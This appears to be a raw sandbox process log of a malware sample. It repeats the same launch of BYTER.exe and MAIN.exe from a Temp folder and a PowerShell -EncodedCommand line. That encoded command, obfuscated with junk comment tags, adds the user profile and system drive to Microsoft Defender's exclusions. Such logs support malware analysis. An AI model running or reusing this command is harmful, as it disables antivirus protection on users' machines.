"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1784115463-2000515224-1938884843-885390482-930745074148145954-8149088231980488001"

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

